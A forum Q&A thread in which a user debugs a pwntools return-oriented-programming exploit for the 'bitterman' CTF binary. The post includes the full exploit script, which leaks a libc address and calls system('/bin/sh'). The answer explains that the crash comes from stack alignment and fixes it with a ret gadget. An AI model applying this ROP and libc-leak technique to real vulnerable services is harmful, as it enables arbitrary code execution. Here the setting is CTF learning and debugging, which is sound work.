# Receiving "Got EOF while reading in interactive" after properly executing system("/bin/sh") using pwntools

Tags: exploit, x86-64, pwntools

I've followed some tutorials on writing a `pwntools`-based exploit for the bitterman ELF binary, used in a CTF competition. However, all my attempts fail with the message below, i.e. `Got EOF while reading in interactive` after having executed `system("/bin/sh")` using a simple ROP chain:

```
nlykkei@ubuntu-dev:~$ python bitterman.py                                                │ 27 p.recvuntil('Thanks!\n')
[+] Starting local process './bitterman': pid 6244                                       │ 28 
[+] puts@glibc: 0x7fcbdc453010                                                           │ 29 #puts_addr = p.recv()[:8].strip().ljust(8,"\x00")
[+] offset: 0x7fcbdc3d2000                                                               │ 30 puts_addr = p.recvuntil('\n', timeout=60)[:-1].strip().ljust(8,"\x00")
[*] Switching to interactive mode                                                        │ 31 log.success('puts@glibc: {}'.format(hex(u64(puts_addr))))
[*] Got EOF while reading in interactive                                                 │ 32 
$                                                                                        │ 33 #Stage 2
[*] Process './bitterman' stopped with exit code -11 (SIGSEGV) (pid 6244)                │ 34 libc_puts = 0x81010
[*] Got EOF while sending in interactive
```

Having traced the exploit using GDB, I can verify that `system("/bin/sh")` gets executed with the `clone` syscall returning a valid child PID. However, after the `clone` syscall nothing really happens, and the parent process continue and crashes (bad return address).

What could be the problem? I'd be grateful if any experienced exploit developer or CTF entusiast could spot the error.

**Update:**
I just rewrote the exploit to use `execv` front-end for `execve` syscall, and then everything works as expected! (a shell is spawned)

`system(..)` works by forking a child using `clone` syscall, whereas `execve` replaces the entire process. Any idea why `system(..)` approach doesn't work?

https://github.com/ctfs/write-ups-2015/blob/master/camp-ctf-2015/pwn/bitterman-300/bitterman

https://www.youtube.com/watch?v=6S4A2nhHdWg

```
from pwn import *

#context(terminal=['tmux', 'new-window'])

p = process('./bitterman')
#p = gdb.debug('./bitterman', 'b main')

#context(os='linux', arch='amd64')
#context.log_level = 'DEBUG'

# Stage 1
main = p64(0x4006ec) #0x400550
plt_puts = p64(0x400520)
got_puts = p64(0x600c50)
pop_rdi = p64(0x400853)

junk = 152*"A"

payload = junk + pop_rdi + got_puts + plt_puts + main

p.recvuntil('name?')
p.sendline('nlykkei')
p.recvuntil('message:')
p.sendline('256')
p.recvuntil('text:')
p.sendline(payload)
p.recvuntil('Thanks!\n')

#puts_addr = p.recv()[:8].strip().ljust(8,"\x00")
puts_addr = p.recvuntil('\n', timeout=60)[:-1].strip().ljust(8,"\x00")
log.success('puts@glibc: {}'.format(hex(u64(puts_addr))))

#Stage 2
libc_puts = 0x81010
libc_system = 0x50300
libc_sh = 0x1aae80

offset = u64(puts_addr) - libc_puts
log.success('offset: {}'.format(hex(offset)))

system_addr = p64(libc_system + offset)
sh_addr = p64(libc_sh + offset)

payload = junk + pop_rdi + sh_addr + system_addr

p.recvuntil('name?')
p.sendline('nlykkei')
p.recvuntil('message:')
p.sendline('256')
p.recvuntil('text:')
p.sendline(payload)
p.recvuntil('Thanks!')

p.clean()
p.interactive()
```

Comment: Did you find some solution of your problem? I asking because I have the same issue.

Comment: Yes, I used `exec` instead of `system`.

Answer (score 3):

I think you might have an alignment problem. Find the address of a ret-only gadget and try putting it in your second payload as follows:

```
ret = p64(0x?????)
payload = junk + ret + pop_rdi + sh_addr + system_addr
```

References:

1. https://research.csiro.au/tsblog/debugging-stories-stack-alignment-matters/
2. https://stackoverflow.com/questions/54393105/libcs-system-when-the-stack-pointer-is-not-16-padded-causes-segmentation-faul
3. https://stackoverflow.com/questions/49391001/why-does-the-x86-64-amd64-system-v-abi-mandate-a-16-byte-stack-alignment

Comment: Do you have any idea why it works with `exec` and not `system`?

Comment: Check this out: https://ropemporium.com/guide.html#Common%20pitfalls It seems that system uses movaps instruction that is picky about alignment. Exec might not have this issue.

Comment: Thanks. Just off-topic: Is ROP still viable given code is compiled with CFI? Or is it like studying stack execution (no DEP)?